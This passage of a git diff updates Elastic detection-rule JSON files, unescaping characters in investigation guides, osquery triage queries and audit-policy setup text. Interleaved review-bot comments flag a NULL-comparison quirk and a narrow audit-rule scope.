@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. 
These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the 
PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json index afe7d4765e8..752f65e8461 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json 
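Review bot: The osquery labelled "Osquery - Retrieve Services Running on User Accounts" in the new `note` string filters with `user_account == null`, which in SQLite never evaluates true; NULL-account rows drop out only because the whole `NOT (...)` predicate becomes NULL, so the exclusion happens by accident rather than by intent. Replacing that term with `user_account IS NULL` makes the filter explicit and self-documenting. The label of the following query, `Retrieve Service Unisgned Executables with Virustotal Link`, also carries a typo (`Unsigned`) that is rendered verbatim in the investigation guide. Both strings are inherited unchanged from the `-` side, so this is a follow-up rather than a regression introduced by this commit.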
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json
index 289bd90695a..36d7eb27f9d 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json
index a1cb9ada44e..ffd4bbe09a5 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json
index 347cc8ecd02..02733ca2348 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289",
- "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n",
+ "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
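Review bot: The `Set-AuditRule` example in the new `setup` string attaches the servicePrincipalName write-audit SACL only to `AD:\CN=Users,DC=Domain,DC=com` with `-InheritanceFlags Children`, so user objects that live in any other OU (the usual layout in production domains) never produce the directory-service-change events this rule depends on, and the rule is silently blind there. The setup text should say that the audit rule has to be applied to every container holding user accounts, or once at the domain root with descendant inheritance, along the lines of `Set-AuditRule -AdObjectPath 'AD:\DC=Domain,DC=com' ... -InheritanceFlags Descendents ...` (exact inheritance value per the script's ActiveDirectorySecurityInheritance options). Whether the default Users container was the deliberate scope is not visible here, so treat this as a caveat to confirm with the rule author. The same text is carried unchanged from the `-` side and in the _105 to _107 versions of this rule.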
diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json
index a3be391be02..283a616baf8 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json
index 17aa96ab23a..f8f572ca12e 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json
index a4780d01ffb..13a02245a52 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json
index cd5e273cf1b..4bf6c953fa5 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json
index 243cb99c9ba..651205f552b 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json
@@ -46,7 +46,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json
index 461ea8e2603..383d0bf7b93 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json
@@ -128,7 +128,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json
index 48c9b22601f..8079f75f81f 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json
@@ -130,7 +130,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json
index bb90304d7d1..544c93a2aa4 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel IP Address Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. 
\n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve 
